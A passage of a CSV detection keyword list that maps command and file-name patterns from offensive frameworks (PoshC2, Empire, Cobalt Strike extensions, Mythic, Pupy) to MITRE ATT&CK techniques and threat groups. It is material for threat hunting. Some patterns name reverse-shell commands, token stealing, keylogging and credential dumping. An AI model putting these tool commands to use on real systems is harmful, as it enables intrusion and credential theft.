- TA0010,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*start_mythic_server.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*start_nbnsspoof*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Start-ACLsAnalysis -Domain*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*startanotherimplant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 
T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-CaptureServer.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*startdaisy*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-domainACLsAnalysis*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*starting Multi-Layered ACLight scan*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*-start-keylogger*,offensive_tool_keyword,gcat,A PoC 
backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*start-keystrokes*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*start-keystrokes-writefile*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Start-MonitorTCPConnections.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*start-process ntdsutil.exe *create full**,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StartProcessFake(*,offensive_tool_keyword,cobaltstrike,TikiTorch was 
named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*Start-PSAmsiClient.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Start-PSAmsiServer.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Start-TCPMonitor*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Start-MonitorTCPConnections.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*startupfolderperistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Start-WebServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*StartWebServiceBeacon*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*static_syscalls_apc_spawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*static_syscalls_apc_spawn*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*static_syscalls_dump*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*statistically-likely-usernames*,offensive_tool_keyword,statistically-likely-usernames,This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.,T1210.001 - T1583.001 - T1583.002,TA0007 - ,N/A,N/A,Credential Access,https://github.com/insidetrust/statistically-likely-usernames,1,1,N/A,N/A,7,699,112,2022-08-31T20:27:53Z,2016-02-14T23:24:39Z -*StayKit.cna*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.cna*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.exe*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.git*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*Steal_Pipe_Token /PipeName*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*steal_token *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - 
T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*steal_token(*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*steal_token.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*steal_token_access_mask*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*steal-cert.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation 
